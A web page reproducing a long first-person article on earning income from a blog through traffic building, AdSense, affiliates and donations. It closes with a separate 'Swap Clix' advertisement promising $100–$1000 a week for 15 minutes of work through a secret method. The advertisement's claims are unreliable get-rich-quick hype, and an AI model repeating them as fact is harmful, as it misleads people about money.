</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">What’s your overall income-generation strategy?</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I don’t want to insult anyone, but most people are utterly clueless when it comes to generating income from their blogs. They slap things together haphazardly with no rhyme or reason and hope to generate lots of money. While I’m a strong advocate of the ready-fire-aim approach, that strategy does require that you eventually aim. Ready-fire-fire-fire-fire will just create a mess.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Take a moment to articulate a basic income-generating strategy for your site. If you aren’t good at strategy, then just come up with a general philosophy for how you’re going to generate income. You don’t need a full business plan, just a description of how you plan to get from $0 per month to whatever your income goal is. An initial target goal I used when I first started this site was $3000 per month. It’s a somewhat arbitrary figure, but I knew that if I could reach $3000 per month, I could certainly push it higher, and $3000 is enough income that it’s going to make a meaningful difference in my finances. I reached that level 15 months after launching the site (in December 2005). And since then it’s continued to increase nicely. Blogging income is actually quite easy to maintain. It’s a lot more secure than a regular job. No one can fire me, and if one source of income dries up, I can always add new ones. We’ll address multiple streams of income soon…</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Are you going to generate income from advertising, affiliate commissions, product sales, donations, or something else? Maybe you want a combination of these things. However you decide to generate income, put your basic strategy down in writing. I took 15 minutes to create a half-page summary of my monetization strategy. I only update it about once a year and review it once a month. This isn’t difficult, but it helps me stay focused on where I’m headed. It also allows me to quickly say no to opportunities that are inconsistent with my plan.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Refer to your monetization strategy (or philosophy) when you need to make design decisions for your web site. Although you may have multiple streams of income, decide which type of income will be your primary source, and design your site around that. Do you need to funnel people towards some kind of order form, or will you place ads all over the site? Different monetization strategies suggest different design approaches. Think about what specific action you want your visitors to eventually take that will generate income for you, and design your site accordingly.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">When devising your income strategy, feel free to cheat. Don’t re-invent the wheel. Copy someone else’s strategy that you’re convinced would work for you too. Do NOT copy anyone’s content or site layout (that’s copyright infringement), but take note of how they’re making money. I decided to monetize this site with advertising and affiliate income after researching how various successful bloggers generated income. Later I added donations as well. This is an effective combo.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Traffic, traffic, traffic</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Assuming you feel qualified to take on the challenge of generating income from blogging (and I haven’t scared you away yet), the three most important things you need to monetize your blog are traffic, traffic, and traffic.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Just to throw out some figures, last month (April 2006), this site received over 1.1 million visitors and over 2.4 million page views. That’s almost triple what it was just six months ago.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Why is traffic so important? Because for most methods of online income generation, your income is a function of traffic. If you double your traffic, you’ll probably double your income (assuming your visitor demographics remain fairly consistent). You can screw almost everything else up, but if you can generate serious traffic, it’s really hard to fail. With sufficient traffic the realistic worst case is that you’ll eventually be able to monetize your web site via trial and error (as long as you keep those visitors coming).</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">When I first launched this blog, I knew that traffic building was going to be my biggest challenge. All of my plans hinged on my ability to build traffic. If I couldn’t build traffic, it was going to be very difficult to succeed. So I didn’t even try to monetize my site for the first several months. I just focused on traffic building. Even after 19 months, traffic building is still the most important part of my monetization plan. For my current traffic levels, I know I’m undermonetizing my site, but that’s OK. Right now it’s more important to me to keep growing the site, and I’m optimizing the income generation as I go along.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Traffic is the primary fuel of online income generation. More visitors means more ad clicks, more product sales, more affiliate sales, more donations, more consulting leads, and more of whatever else that generates income for you.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">With respect to traffic, you should know that in many respects, the rich do get richer. High traffic leads to even more traffic-building opportunities that just aren’t accessible for low-traffic sites. On average at least 20 bloggers add new links to my site every day, my articles can easily surge to the top of social bookmarking sites like del.icio.us, and I’m getting more frequent requests for radio interviews. Earlier this year I was featured in USA Today and in Self Magazine, which collectively have millions of readers. Journalists are finding me by doing Google searches on topics I’ve written about. These opportunities were not available to me when I was first starting. Popular sites have a serious advantage. The more traffic you have, the more you can attract.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If you’re intelligent and web savvy, you should also be able to eventually build a high-traffic web site. And you’ll be able to leverage that traffic to build even more traffic.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">How to build traffic</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Now if traffic is so crucial, how do you build it up to significant levels if you’re starting from rock bottom?</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I’ve already written a lengthy article on this topic, so I’ll refer you there: How to Build a High Traffic Web Site (or Blog). If you don’t have time to read it now, feel free to bookmark it or print it out for later. That article covers my general philosophy of traffic-building, which centers on creating content that provides genuine value to your visitors. No games or gimmicks.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">There is one other important traffic-building tip I’ll provide here though.</span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span style="color: #006699;"><em><span style="font-size: x-small;">Blog Carnivals.</span></em></span><span style="color: #006699; font-size: x-small;"> Take full advantage of blog carnivals when you’re just starting out (click the previous link to learn what carnivals are if you don’t already know). Periodically submit your best blog posts to the appropriate carnivals for your niche. Carnivals are easy ways to get links and traffic, and best of all, they’re free. Submitting only takes minutes. Use the easy sign-up form at Conservative Cat. Do<em>NOT</em> spam the carnivals with irrelevant material — only submit to the carnivals that are match for your content.</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">In my early traffic-building days, I would do carnivals submissions once a week, and it helped a great deal in going from nothing to about 50,000 visitors per month. You still have to produce great content, but carnivals give you a free shot at marketing your unknown blog up to a certain level. Carnivals are like an open-mic night at a comedy club — they give amateurs a chance to show off their stuff. I still submit to certain carnivals every once in a while, but now my traffic is so high that relatively speaking, they don’t make much difference anymore. Just to increase my traffic by 1% in a month, I need 11,000 new visitors, and even the best carnivals don’t push that much traffic. But you can pick up dozens or even hundreds of new subscribers from each round of carnival submissions, so it’s a great place to start. Plus it’s very easy.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If your traffic isn’t growing month after month, does it mean you’re doing something wrong? Most likely you aren’t doing enough things right. Again, making the mistakes is not the issue. Missing opportunities is.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Will putting ads on your site hurt your traffic?</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Here’s a common fear I hear from people who are considering monetizing their web sites:</span><br />
</div><div align="justify"><em><span style="color: #006699; font-family: Verdana; font-size: x-small;">Putting ads on my site will cripple my traffic. The ads will drive people away, and they’ll never come back.</span></em><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Well, in my experience this is absolutely, positively, and otherwise completely and totally… FALSE. It’s just not true. Guess what happened to my traffic when I put ads on my site. Nothing. Guess what happened to my traffic when I put up more ads and donation links. Nothing. I could detect no net effect on my traffic whatsoever. Traffic continued increasing at the same rate it did before there were ads on my site. In fact, it might have even helped me a little, since some bloggers actually linked to my site just to point out that they didn’t like my ad layout. I’ll leave it up to you to form your own theories about this. I think it’s probably because there’s so much advertising online already that even though some people will complain when a free site puts up ads, if they value the content, they’ll still come back, regardless of what they say publicly.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I think most mature people understand that it’s reasonable for a blogger to earn income from their work. I think I’m lucky in that my audience tends to be very mature — immature people generally aren’t interested in personal development. To create an article like this takes serious effort, not to mention the hard-earned experience that’s required to write it. This article alone took me over 15 hours of writing and editing. I think it’s perfectly reasonable to earn an income from such work. If you get no value from it, you don’t pay anything. What could be more fair than that? The more income this blog generates, the more I can put into it. For example, I used some of the income to buy podcasting equipment and added a podcast to the site. I’ve recorded 13 episodes so far. The podcasts are all ad-free. I’m also planning to add some additional services to this site in the years ahead. More income = better service.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">At the time of this writing, my site is very ad-heavy. Some people point this out to me as if I’m not aware of it: “You know, Steve. Your web site seems to contain an awful lot of ads.” Of course I’m aware of it. I’m the one who put the ads there. There’s a reason I have this configuration of ads. They’re effective! People keep clicking on them. If they weren’t effective, I would remove them right away and try something else.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I do avoid putting up ads that I personally find annoying when I see them on other sites, including pop-ups and interstitials (stuff that flies across your screen). Even though they’d make me more money, in my opinion they degrade the visitor experience too much.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I also provide two ad-free outlets, so if you really don’t like ads, you can actually read my content without ads. First, I provide a full-text RSS feed, and at least for now it’s ad-free. I do, however, include a simple donation request in the bottom of my feeds.</span><br />
</div><div align="justify"><span style="font-family: Verdana; font-size: x-small;"><span style="color: #006699;">If you want to see some actual traffic data, take a look at my 2005 traffic growth chart. I first put ads on the site in February 2005, and although the chart doesn’t cover pre-February traffic growth, the growth rate was very similar before then. For an independent source, you can also look at my traffic chart on </span><a href="http://www.alexa.com/data/details/traffic_details?q=&url=www.stevepavlina.com" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Alexa</span></a><span style="color: #006699;">. You can select different Range options to go further back in time.</span></span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Multiple streams of income</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">You don’t need to put all your eggs in one basket. Think multiple streams of income. On this site I actually have six different streams of income. Can you count them all? Here’s a list:</span><br />
</div><ol><li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Google Adsense ads (pay per click and pay per impression advertising)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Donations (via PayPal or snail mail — yes, some people do mail a check)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Text Link Ads (sold for a fixed amount per month)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Chitika eMiniMalls ads (pay per click)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Affiliate programs like Amazon and LinkShare<img border="0" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=07TLK0uCo0c&bids=7097.10000025&type=3&subid=0" width="1" /> (commission on products sold, mostly books)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Advertising sold to individual advertisers (three-month campaigns or longer)</span><br />
</div></li>
</ol><div align="justify"><span style="color: #006699; font-family: Verdana;"><em><span style="font-size: x-small;">Note:</span></em><span style="font-size: x-small;"> If you’re reading this article a while after its original publication date, then this list is likely to change. I frequently experiment with different streams.</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Adsense is my biggest single source of income, but some of the others do pretty well too. Every stream generates more than $100/month.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">My second biggest income stream is actually donations. My average donation is about $10, and I’ve received a number of $100 donations too. It only took me about an hour to set this up via PayPal. So even if your content is free like mine, give your visitors a means to voluntarily contribute if they wish. It’s win-win. I’m very grateful for the visitor support. It’s a nice form of feedback too, since I notice that certain articles produced a surge in donations — this tells me I’m hitting the mark and giving people genuine value.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">These aren’t my only streams of income though. I’ve been earning income online since 1995. With my computer games business, I have direct sales, royalty income, some advertising income, affiliate income, and donations (from the free articles). And if you throw in my wife’s streams of income, it gets really ridiculous: VegFamily.com advertising, direct book sales, book sales through distributors, web consulting, affiliate income, more Adsense income, and probably a few sources I forgot. Suffice it to say we receive a lot of paychecks. Some of them are small, but they add up. It’s also extremely low risk — if one source of income dries up, we just expand existing sources or create new ones. I encourage you to think of your blog as a potential outlet for multiple streams of income too.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Automated income</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">With the exception of #6, all of these income sources are fully automated. I don’t have to do anything to maintain them except deposit checks, and in most cases I don’t even have to do that because the money is automatically deposited to my bank account.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I love automated income. With this blog I currently have no sales, no employees, no products, no inventory, no credit card processing, no fraud, and no customers. And yet I’m still able to generate a reasonable (and growing) income.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Why get a regular job and trade your time for money when you can let technology do all that work for you? Imagine how it would feel to wake up each morning, go to your computer, and check how much money you made while you were sleeping. It’s a really nice situation to be in.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Blogging software and hardware</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I use WordPress for this blog, and I highly recommend it. Wordpress has lots of features and a solid interface. And you can’t beat its price — free.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">The rest of this site is custom-coded HTML, CSS, PHP, and MySQL. I’m a programmer, so I coded it all myself. I could have just as easily used an existing template, but I wanted a simple straightforward design for this site, and I wanted the look of the blog to match the rest of the site. Plus I use PHP and MySQL to do some creative things outside the blog, like the Million Dollar Experiment.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I don’t recommend using a hosted service like Blogger if you want to seriously monetize your blog. You don’t get enough control. If you don’t have your own URL, you’re tying yourself to a service you don’t own and building up someone else’s asset. You want to build page rank and links for your own URL, not someone else’s. Plus you want sufficient control over the layout and design of your site, so you can jump on any opportunities that require low-level changes. If you use a hosted blog, you’re at the mercy of the hosting service, and that puts the future of any income streams you create with them at risk. It’s a bit more work up front to self-host, but it’s less risky in the long run.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Web hosting is cheap, and there are plenty of good hosts to choose from. I recommend Pair.com for a hosting account. They aren’t the cheapest, but they’re very reliable and have decent support. I know many online businesses that host with them, and my wife refers most of her clients there.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">As your traffic grows you may need to upgrade to a dedicated server or a virtual private server (VPS). My web server is hosted by ServInt.net. What I like about ServInt is that they have a nice upgrade path as my traffic keeps growing. I’ve gone through several upgrades with them already, and all have been seamless. The nice thing about having your own server is that you can put as many sites on it as the server can handle. I have several sites running on my server, and it doesn’t cost me any additional hosting fees to add another site.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Comments or no comments</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">When I began this blog, I started out with comments enabled. As traffic grew, so did the level of commenting. Some days there were more than 100 comments. I noticed I was spending more and more time managing comments, and I began to question whether it was worth the effort. It became clear that with continued traffic growth, I was going to have to change my approach or die in comment hell. The personal development topics I write about can easily generate lots of questions and discussion. Just imagine how many follow-up questions an article like this could generate. With tens of thousands of readers, it would be insane. Also, nuking comment spam was chewing up more and more of my time as well.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">But after looking through my stats, I soon realized that only a tiny fraction of visitors ever look at comments at all, and an even smaller fraction ever post a comment (well below 1% of total visitors). That made my decision a lot easier, and in October 2005, I turned blog comments off. In retrospect that was one of my best decisions. In fact, I wish I had done it sooner.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If you’d like to read the full details of how I came to this decision, I’ve written about it previously: Blog Comments and More on Blog Comments.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Do you need comments to build traffic? Obviously not. Just like when I put up ads, I saw no decline in traffic when I turned off comments. In fact, I think it actually helped me. Although I turned off comments, I kept trackbacks enabled, so I started getting more trackbacks. If people wanted to publicly comment on something I’d written, they had to do so on their own blogs and post a link. So turning off comments didn’t kill the discussion — it just took it off site. The volume of trackbacks is far more reasonable, and I can easily keep up with it. I even pop onto other people’s sites and post comments now and then, but I don’t feel obligated to participate because the discussion isn’t on my own site.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I realize people have very strong feelings about blog comments and community building. Many people hold the opinion that a blog without comments just isn’t a blog. Personally I think that’s utter nonsense — the data just doesn’t support it. The vast majority of blog readers neither read nor post comments. Only a very tiny and very vocal group even care about comments. Some bloggers say that having comments helps build traffic, but I saw no evidence of that. In fact, I think it’s just the opposite. Managing comments detracts from writing new posts, and it’s far better to get a trackback and a link from someone else’s blog vs. a comment on your own blog. As long-term readers of my blog know, when faced with ambiguity, my preference is to try both alternatives and compare real results with real results. After doing that my conclusion is this: No comment. </span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Now if you want to support comments for non-traffic-building reasons like socializing or making new contacts, I say go for it. Just don’t assume that comments are necessary or even helpful in building traffic unless you directly test this assumption yourself.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Build a complete web site, not just a blog</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Don’t limit your web site to just a blog. Feel free to build it out. Although most of my traffic goes straight to this blog, there’s a whole site built around it. For example, the home page of this site presents an overview of all the sections of the site, including the blog, article section, audio content, etc. A lot of people still don’t know what a blog is, so if your whole site is your blog, those people may be a little confused.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Testing and optimization</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">In the beginning you won’t know which potential streams of income will work best for you. So try everything that’s reasonable for you. If you learn about a new potential income stream, test it for a month or two, and measure the results for yourself. Feel free to cut streams that just aren’t working for you, and put more effort into optimizing those streams that show real promise.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">A few months ago, I signed up for an account with Text Link Ads. It took about 20 minutes. They sell small text ads on my site, split the revenue with me 50-50, and deposit my earnings directly into my PayPal account. This month I’ll make around $600 from them, possibly more if they sell some new ads during the month. And it’s totally passive. If I never tried this, I’d miss out on this easy extra income.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">For many months I’ve been tweaking the Adsense ads on this site. I tried different colors, sizes, layouts, etc. I continue to experiment now and then, but I have a hard time beating the current layout. It works very well for me. Adsense doesn’t allow publishers to reveal specific CPM and CTR data, but mine are definitely above par. They started out in the gutter though. You can easily double or triple your Adsense revenue by converting a poor layout into a better one. This is the main reason why during my first year of income, my traffic grew at 20% per month, but my income grew at 50% per month. Frequent testing and optimization had a major positive impact. Many of my test failed and even made my income go down, but I’m glad I did all that testing. If I didn’t then my Adsense income would only be a fraction of what it is now.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">It’s cheap to experiment. Every new advertising or affiliate service I’ve tried so far has been free to sign up. Often I can add a new income stream in under and hour and then just wait a month and see how it does. If it flops then at least I learned something. If it does well, wonderful. As a blogger who wants to generate income, you should always be experimenting with new income streams. If you haven’t tried anything new in six months, you’re almost certainly missing some golden opportunities. Every blog is different, so you need to test things for yourself to see what works for you. Failure is impossible here — you either succeed, or you learn something.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Pick your niche, but make sure it isn’t too small</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Pick a niche for your blog where you have some significant expertise, but make sure it’s a big enough niche that you can build significant traffic. My wife runs VegFamily.com, a popular vegan web site. She does pretty well within her niche, but it’s just not a very big niche. On the other hand, my topic of personal development has much broader appeal. Potentially anyone can be interested in improving themselves, and I have the flexibility to write about topics like productivity, self-discipline, relationships, spirituality, health, and more. It’s all relevant to personal development.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Pick a niche that you’re passionate about. I’ve written 400+ articles so far, and I still feel like I’m just getting started. I’m not feeling burnt out at all. I chose to build a personal development site because I’m very knowledgeable, experienced, and passionate about this subject. I couldn’t imagine a better topic for me to write about.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Don’t pick a niche just because you think it will make you money. I see many bloggers try to do that, and it’s almost invariably a recipe for failure. Think about what you love most, and then find a way to make your topic appealing to a massive global audience. Consider what will provide genuine value to your visitors. It’s all about what you can give.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">A broad enough topic creates more potential advertising partners. If I keep writing on the same subtopic over and over, I may exhaust the supply of advertisers and hit an income ceiling. But by writing on many different topics under the same umbrella, I widen the field of potential advertisers. And I expand the appeal of my site at the same time.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Make it clear to your visitors what your blog/site is about. Often I visit a blog with a clever title and tagline that reveals nothing about the site’s contents. In that case I generally assume it’s just a personal journal and move on. I love to be clever too, but I’ve found that clarity usually yields better results than cleverness.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Posting frequency and length</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Bloggers have different opinions about the right posting length and frequency. Some bloggers say it’s best to write short (250-750 word) entries and post 20x per week or more. I’ve seen that strategy work for some, but I decided to do pretty much the opposite. I usually aim for about 3-5 posts per week, but my posts are much longer (typically 1000-2000 words, sometimes longer than 5000 words, including the monster you’re reading right now). That’s because rather than throwing out lots of short tips, I prefer to write more exhaustive, in-depth articles. I find that deeper articles are better at generating links and referrals and building traffic. It’s true that fewer people will take the time to read them, but those that do will enjoy some serious take-away value.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Expenses</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Blogging is dirt cheap.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I don’t spend money on advertising or promotion, so my marketing expenses are nil. Essentially my content is my marketing. If you like this article, you’ll probably find many more gems in the archives.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">My only real expenses for this site are the hosting (I currently pay $149/month for the web server and bandwidth) and the domain name renewal ($9/year). Nearly all of the income this site generates is profit. This trickles down to my personal income, so of course it’s subject to income tax. But the actual business expenses are minimal.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">The reason I pay so much for hosting is simply due to my traffic. If my traffic were much lower, I could run this site on a cheap shared hosting account. A database-driven blog can be a real resource hog at high traffic levels. The same goes for online forums. As traffic continues to increase, my hosting bill will go up too, but it will still be a tiny fraction of total income.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Perks</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Depending on the nature of your blog, you may be able to enjoy some nice perks as your traffic grows. Almost every week I get free personal development books in the mail (for potential review on this site). Sometimes the author will send it directly; other times the publisher will ship me a batch of books. I also receive CDs, DVDs, and other personal development products. It’s hard to keep up sometimes (I have a queue of about two dozen books right now), but I am a voracious consumer of such products, so I do plow through them as fast as I can. When something strikes me as worthy of mention, I do indeed write up a review to share it with my visitors. I do have very high standards though, so I review less than 10% of what I receive. I’ve read over 700 books in this field and listened to dozens of audio programs, so I’m pretty good at filtering out the fluff. As I’m sure you can imagine, there’s a great deal of self-help fluff out there.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">My criteria for reviewing a product on this site is that it has to be original, compelling, and profound. If it doesn’t meet this criteria, I don’t review it, even if there’s a generous affiliate program. I’m not going to risk abusing my relationship with my visitors just to make a quick buck. Making money is not my main motivation for running this site. My main motivation is to grow and to help others grow, so that always comes first.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Your blog can also gain you access to certain events. A high-traffic blog becomes a potential media outlet, so you can actually think of yourself as a member of the press, which indeed you are. In a few days, my wife and I will be attending a three-day seminar via a free press pass. The regular price for these tickets is $500 per person. I’ll be posting a full review of the seminar next week. I’ve been to this particular seminar in 2004, so I already have high expectations for it. Dr. Wayne Dyer will be the keynote speaker.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I’m also using the popularity of this blog to setup interviews with people I’ve always wanted to learn more about. This is beautifully win-win because it creates value for me, my audience, and the person being interviewed. Recently I posted an exclusive interview with multi-millionaire Marc Allen as well as a review of his latest book, and I’m lining up other interviews as well. It isn’t hard to convince someone to do an interview in exchange for so much free exposure.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Motivation</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I don’t think you’ll get very far if money is your #1 motivation for blogging. You have to be driven by something much deeper. Money is just frosting. It’s the cake underneath that matters. My cake is that I absolutely love personal development – not the phony “fast and easy” junk you see on infomercials, but real growth that makes us better human beings. That’s my passion. Pouring money on top of it just adds more fuel to the fire, but the fire is still there with or without the money.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">What’s your passion? What would you blog about if you were already set for life?</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Blogging lifestyle</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Perhaps the best part of generating income from blogging is the freedom it brings. I work from home and set my own hours. I write whenever I’m inspired to write (which for me is quite often). Plus I get to spend my time doing what I love most — working on personal growth and helping others do the same. There’s nothing I’d rather do than this.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Perhaps it’s true that 99 out of 100 people can’t make a decent living from blogging yet. But maybe you’re among the 1 in 100 who can.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: x-large;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: #666666; font-family: Verdana, arial, tahoma; font-size: 12px;"><span style="color: #ff854a; font-family: Verdana;"><b><span class="Apple-style-span" style="font-size: x-large;">Earn And Make Money Online Today </span></b></span><span style="color: #006699; font-family: Verdana; font-size: x-small;"><br />
</span><span style="color: grey; font-family: Verdana; font-size: x-small;"><br />
</span><span style="color: #006699; font-family: Verdana; font-size: x-small;"><br />
<img align="right" alt="Make money success" border="0" height="280" src="http://www.finalsense.com/learning/image/success_jump.jpg" style="border-bottom-color: rgb(104, 136, 152); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(104, 136, 152); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(104, 136, 152); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(104, 136, 152); border-top-style: solid; border-top-width: 1px;" width="162" />Ever heard of the <a href="http://jvdmds.googleland.hop.clickbank.net/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;"><span style="text-decoration: none;">Swap Clix</span></span></a> Method?<br />
"How would you like to earn an extra $100, $500, or $1000 every week with 15 minutes of your time?"<br />
Im not pulling your leg!<br />
Make money 15 minutes from now!<br />
Discover the secrets of <span style="color: #006699;">Swap Clix</span>! New methods combine the power of Google's AdWords and AdSense -never seen before!<br />
Are you like me? Trying to make money on the internet but failing at every attempt? I spent all sorts of money on how to make money products, guaranteed income products, MLM marketing. You name it I've been there.<br />
Then one day I had an idea. An amazing idea actually.<br />
I have found a way to create a never ending stream of income. This method has never been released to the public before. Very few, if anyone has implemented this. I have decided to share my idea with you. The only thing I ask is you do not share this information with anyone.<br />
Why am I sharing this information you ask? Well the main reason is I spent so much money on programs that promised me riches. None of them have delivered. I know how you feel, and I want to put an end to it. I guarantee you will make money with my system or I will refund you 100% of your purchase price!<br />
<br />
Now before I get to deep into the details let me tell you what this program is NOT.<br />
This is not a promote my affiliate program to make money! This is not a put ads in the newspaper to make money! This is not a stuff envelope scam to make money! This is not a make money with surveys program! This is not a paid to read email program! This is not a paid to click program! This is not like anything you have ever seen!<br />
YOU DO NOT EVEN NEED TO SELL ANYTHING! </span></span></span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: #666666; font-family: Verdana, arial, tahoma; font-size: 12px;"></span></span></span><br />
